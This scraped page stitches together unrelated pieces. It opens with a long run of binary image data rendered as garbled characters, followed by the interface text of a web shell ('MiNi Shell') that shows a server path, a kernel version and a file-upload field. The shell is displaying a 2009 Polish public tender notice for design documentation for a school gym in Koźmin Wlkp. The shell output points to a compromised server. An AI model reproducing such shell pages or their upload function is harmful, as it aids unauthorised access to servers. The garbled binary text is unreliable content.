JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090724/119579-N-2009.html

<p class="kh_header"><b>Krotoszyn: Wykonanie dokumentacji projektowej i kosztorysowej dla przedsięwzięcia  pn. Budowa sali gimnastycznej w I Liceum Ogólnokształcącym im. Powstańców Wlkp. w Koźminie Wlkp.</b><br>
<b>Numer ogłoszenia: 119579 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej i kosztorysowej dla przedsięwzięcia  pn. Budowa sali gimnastycznej w I Liceum Ogólnokształcącym im. Powstańców Wlkp. w Koźminie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Celem niniejszego zamówienia jest : 
Wykonanie dokumentacji projektowej i kosztorysowej dla przedsięwzięcia  pn. Budowa sali gimnastycznej w I Liceum Ogólnokształcącym im. Powstańców Wlkp. w Koźminie Wlkp.
uzyskanie  w imieniu inwestora pozwolenia na budowę obiektu 
nadzór autorski planowanej inwestycji

ZAŁOŻENIA  DO PROJEKTOWANIA

1.	Działki nr 1458, 1460/1 wchodzą w skład   zabudowań których  głównym obiektem kubaturowym jest  budynek I LO w Koźminie Wlkp.  Cała nieruchomość znajduje się w ewidencji zabytków (tzw. spis zabytków)
2.	Zastosowania programowe powinny być wyważone ekonomicznie (łączny koszt inwestycji nie może przekroczyć 3,0 mln zł), gwarantujące tanią bezawaryjną eksploatację obiektu
3.	Wymiary płyty boiska 24x12   wraz z niezbędnym zapleczem techniczno-funkcjonalnym i infrastrukturą zewnętrzną Projektowany obiekt powinien  uwzględniać budowę zaplecza socjalno-dydaktyczno-magazynowego stanowiącego integralną część sali gimnastycznej zawierającego między innymi:
salę gimnastyczną o wymiarach boiska 24x12m
pomieszczenie siłowni wraz z magazynem sprzętu sportowego 
pomieszczenia dydaktyczne 
                    multimedialne centrum informacyjne (obejmujące:  2  sale                        komputerowe na  16 + 1 (serwer)  stanowisk każda  
                    biblioteka z czytelnią ok. 60 m2
pokój dla nauczycieli W-fu
szatnie  damskie i męskie
zaplecze sanitarne z natryskami (oddzielnie damskie i męskie)
toaletę ogólnodostępną  przystosowaną dla osób niepełnosprawnych
schowek porządkowy
kotłownia  -  gazowa wraz z instalacjami  
zaplecze socjalno-dydaktyczno-magazynowe (dobudówka)  winna być wykonana  na jednym poziomie

4.	Program sportowy sali gimnastycznej  umożliwiające prowadzenie gier zespołowych takich jak:
koszykówka
piłka nożna (boiska nienormatywne)
piłka siatkowa 
i inne
5.	Zaplanować należy uchwyty mocujące m.in. do siatkówki, drabinek itp.
6.	Sala winna być wykonana  w technologii  tradycyjnej murowanej
7.	System zabezpieczeń antywłamaniowych oraz p.poż.
8.	Przystosowanie  budynku do korzystania z niego przez osoby niepełnosprawne
9.	Rekultywacja terenu i drzewostanu; mała architektura
10.	Wykonanie robót  zasadniczych związanych z realizacją planowanej inwestycji wymaga robót przygotowawczych związanych z przygotowaniem terenu budowy tj. wykonania rozbiórki  istniejących obiektów kubaturowych 
budynku starej sali gimnastycznej (budynek murowany jednokondygnacyjny, dach drewniany, papowy o łącznej powierzchni zabudowy ok. 264,34 m2
budynku szatni (przylegającego do  budynku sali gimnastycznej) budynek murowany jednokondygnacyjny, dach drewniany, papowy o łącznej powierzchni zabudowy ok. 38 m2
DOKUMENTACJA

Zakres dokumentacji, o której  mowa wyżej obejmuje: 
Minimum trzy wersje koncepcji projektowo-przestrzennych wraz z infrastrukturą oraz analizą kosztów przedsięwzięcia dla każdej koncepcji.
Koncepcje (papierowe) wraz z  wizualizacją komputerową projektowanego obiektu przedstawione zostaną  Zamawiającemu  celem  dokonania wyboru  najkorzystniejszej. Wykonawca zobowiązany  będzie do przedstawienia -  omówienia poszczególnych koncepcji Zamawiającemu. Zamawiający najdalej w ciągu 14 dni od dnia otrzymania koncepcji zaakceptuje ją bądź zgłosi ewentualne uwagi.
Projekt budowlany wykonany na bazie wybranego przez Zamawiającego wariantu rozwiązań architektonicznych winien być opracowany zgodnie z  aktualnym Rozporządzeniem Ministra Infrastruktury   w sprawie szczegółowego zakresu i formy projektu budowlanego 
Projekt wykonawczy opracowany na bazie zatwierdzonego projektu budowlanego stanowiący jego uszczegółowienie  i zawierający w zależności od potrzeb takie opracowania jak  
 Projekt wykonawczy architektury wraz ze wszystkimi niezbędnymi     detalami (uwzględniający kolorystykę elewacji oraz elementy      wystroju wnętrz) 
 Projekt wykonawczy konstrukcji obiektu wraz z niezbędnymi do     wykonawstwa rysunkami
 Projekt wykonawczy sieci zewnętrznych i przyłączy wraz z      ewentualnymi i niezbędnymi uzgodnieniami zapewniającymi      dostawy mediów do obiektu
 projekty wykonawcze poszczególnych instalacji wewnętrznych      budynku (elektroenergetycznej, c.o.  wentylacji, wod.-kan.      telefonicznej, alarmowej i pozostałych uwzględnionych w       projekcie budowlanym
    Projekt wykonawczy technologii kotłowni
    Projekt wykonawczy  zieleni i form  małej architektury
Informację dotyczącą bezpieczeństwa i ochrony zdrowia w trakcie wykonywania robót budowlanych - zgodnie z rozporządzeniem Ministra Infrastruktury w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia
Przedmiar robót lub kosztorys ofertowy zawierający zestawienie robót w kolejności ich technologicznego wykonania  wraz z ich szczegółowym opisem Opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno-użytkowego 
Kosztorys inwestorski  na całość robót wykonany zgodnie  z Rozporządzeniem Ministra Infrastruktury w sprawie  określenia metod i podstaw sporządzania kosztorysów inwestorskiego, obliczania planowanych kosztów  prac projektowych oraz planowanych kosztów robót budowlanych w programie funkcjonalno-użytkowym 
Specyfikacje techniczne  wykonania i odbioru robót - zawierające zbiory wymagań w zakresie sposobu wykonywania robót budowlanych.

OBOWIĄZKI WYKONAWCY

Wykonanie we własnym zakresie i na własny koszt niezbędnych badań geotechnicznych podłoża gruntowego i pozyskanie niezbędnej dokumentacji
Pozyskanie we własnym zakresie i na własny koszt mapy geodezyjnej do celów projektowych
Sporządzenie inwentaryzacji budowlanej istniejących obiektów budowlanych usytuowanych na terenie przeznaczonym pod budowę nowej sali  dla potrzeb ujęcia w  kosztorysach  całego przedsięwzięcia robót związanych z rozbiórką  istniejącego budynku sali oraz szatni
Uzyskanie warunków technicznych zasilania w energię elektryczną, wodę, gaz ziemny,  odprowadzenie ścieków sanitarnych i odpadowych i.in.
Wykonawca zobowiązany jest dokonać wizji lokalnej ternu 
Wykonawca zobowiązany jest do opisania materiałów urządzeń, technologii za pomocą dostatecznie dokładnych parametrów technicznych bez podawania  ich znaków towarowych patentów lub pochodzenia. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy, marki lub producenta wskazaniu temu muszą towarzyszyć wyrazy lub równoważny  lub o parametrach nie gorszych niż 
Wykonawca zobowiązany jest do uzyskania  wszelkich uzgodnień niezbędnych do uzyskania pozwolenia na budowę 
Wykonawca złoży oświadczenie o wykonaniu i przekazaniu przedmiotu zamówienia w stanie kompletnym z punktu widzenia celu jakiemu ma służyć w oparciu o najnowsze rozwiązania techniczne
Dokumentacja powinna spełniać warunki określone w decyzji o ustaleniu lokalizacji celu publicznego wydanego przez  Burmistrza Mi G Koźmin Wlkp.
Dokumentacja powinna zawierać wszystkie niezbędne  opinie, oceny, badania, rozwiązania ewentualnych kolizji i inne niezbędne dla prawidłowej realizacji robót
Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego. W ramach pełnienia nadzoru autorskiego Wykonawca zobowiązany będzie do:
  udzielania odpowiedzi na zapytania  dotyczące dokumentacji na       etapie ogłoszenia  postępowania na wykonanie robót budowlanych       związanych z budową sali
   czuwania w toku realizacji robót budowlanych nad zgodnością        rozwiązań technicznych, materiałowych i użytkowych z        dokumentacją projektową
 uzupełniania szczegółów dokumentacji projektowej oraz       wyjaśnienia wykonawcy robót budowlanych wątpliwości       powstałych w toku realizacji tych robót 
    udział w naradach technicznych 
   udział w odbiorze poszczególnych części robót budowlanych oraz     odbiorze końcowym inwestycji
  inne prace dla których  udział projektanta  będzie niezbędny do     prawidłowego  wykonania robót budowlanych
  udzielania wyjaśnień na każde wezwanie Zamawiającego w zakresie      robót budowlanych realizowanych na podstawie  projektu będącego      przedmiotem umowy do czasu wykonania, odbioru robót i uzyskania      pozwolenia na użytkowanie.
Wykonawca zobowiązany jest do   przygotowania i dostarczenia  kompletnej dokumentacji wraz z uzyskanym pozwoleniem na budowę 

Wymienione opracowania projektowe winny być wykonane i dostarczone Zamawiającemu w następujących ilościach egzemplarzy:
Dokumentacja projektowa w tym: projekt budowlany i wykonawczy  dla wszystkich niezbędnych  branż wraz z niezbędnymi uzgodnieniami- po 5 egz.
Informacja BIOZ - 5 egz.
Kosztorys inwestorski z rozbiciem na poszczególne branże -  po 2 egz.
Przedmiar robót/kosztorys ofertowy z rozbiciem na poszczególne branże -  po 2 egz.
Specyfikacja techniczna wykonania i odbioru robót 5 egz.
Oraz całość opracowania projektowego w postaci elektronicznej w formie plików  w formacie PDF zabezpieczona przed zmianami i umożliwiającymi przesłanie dokumentacji drogą elektroniczną.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do postępowania przetargowego zostaną dopuszczeni Oferenci spełniający następujące wymagania:
a)	złożą prawidłową pod względem formalnym ofertę,
b)	posiadają niezbędne uprawnienia do występowania w obrocie prawnym oraz do wykonywania prac objętych przetargiem, złożą wypis z rejestru handlowego lub z ewidencji działalności gospodarczej potwierdzający dopuszczenie do obrotu prawnego w zakresie objętym zamówieniem 
c)	spełniają  wymagania art. 22 ust. 1 oraz nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych  
d)	posiadają niezbędną wiedzę  i doświadczenie, znajdują się w sytuacji  finansowej,  technicznej oraz posiadają  personel mający stosowne uprawnienia i kwalifikacje pozwalające na wykonanie zamówienia: 
o	wykażą się  realizacją min. 1 (jednego)  zamówienia  zrealizowanego z należytą starannością, odpowiadającego swoim rodzajem i wartością usługom stanowiącym  przedmiot zamówienia.  Z potwierdzeniem iż wykonane prace wykonane zostały należycie.
o	Wykaz osób którymi dysponuje  lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności . Jeżeli wykonawca nie dysponuje własnym personelem  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w ww. wykazie  wykonawca wykazał  te osoby.
o	Dokumenty stwierdzające, że osoby które będą  wykonywać zamówienie  posiadają stosowne uprawnienia do wykonywania zamówienia oraz  aktualne zaświadczenie o przynależności  do właściwej izby samorządu zawodowego
e)	Polisa lub inny dokument ubezpieczeniowy  potwierdzający ze wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności gospodarczej na  wartość równą min. wartości ceny ofertowej brutto 
	

	Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach o których mowa w niniejszej SIWZ dołączonych do oferty na zasadzie spełnia-nie spełnia.  Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca   spełnia  wymienione  warunki.                                                                    Uzupełnienie wymaganych dokumentów będzie możliwe  po upływie terminu składania ofert, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania.        W przypadku wątpliwości co do treści dokumentów złożonych przez wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu, Zamawiający może wezwać wykonawców w określonym przez siebie terminie do złożenia wyjaśnień.
	Nie spełnienie jakiegokolwiek ww. warunku spowoduje odrzucenie oferty z zastrzeżeniem art. 26 ust. 3 oraz  25 ust. 1 ustawy Prawo zamówień publicznych. Oferent o tym fakcie zostanie niezwłocznie powiadomiony przez Zamawiającego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące dokumenty:


Wypełniony formularz ofertowy 
Oświadczenie o spełnianiu  wymagań art. 22 ust. 1 oraz nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych  
Dokument potwierdzający spełnienie przez wykonawców warunków o których mowa w art. 26 ust. 2 ustawy Prawo zamówień publicznych  jak również dokumenty określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja 2006 r.  w sprawie rodzajów  dokumentów jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być  składane tj:
aktualny wystawiony nie wcześniej niż 6 miesięcy przed terminem upływu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, potwierdzający dopuszczenie Oferenta do obrotu prawnego w zakresie objętym tym zamówieniem  
wykażą się  realizacją min. 1 (jednego)  zamówienia  zrealizowanego z należytą starannością, odpowiadającego swoim rodzajem i wartością usługom stanowiącym  przedmiot zamówienia.  Z potwierdzeniem iż wykonane prace wykonane zostały należycie. 
Wykaz osób którymi dysponuje  lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności . Jeżeli wykonawca nie dysponuje własnym personelem  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w ww. wykazie  wykonawca wykazał  te osoby 
Dokumenty stwierdzające, że osoby które będą  wykonywać zamówienie  posiadają stosowne uprawnienia do wykonywania zamówienia oraz  aktualne zaświadczenie o przynależności  do właściwej izby samorządu zawodowego
Polisa lub inny dokument ubezpieczeniowy  potwierdzający ze wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności gospodarczej na  wartość równą min. wartości ceny ofertowej brutto 
	


Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 3  składa dokument potwierdzające ze:
nie otwarto jego likwidacji ani nie ogłoszono upadłości,
nie orzeczono wobec niego zakazu ubiegania się o zamówienie;

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-krotoszyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.powiat-krotoszyn.pl
lub Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn
pok. 25.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2009 godzina 11:00, miejsce: Starostwo Powiatowe w Krotoszynie
ul. 56 Pułku Piechoty Wlkp. 10
63-700 Krotoszyn.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com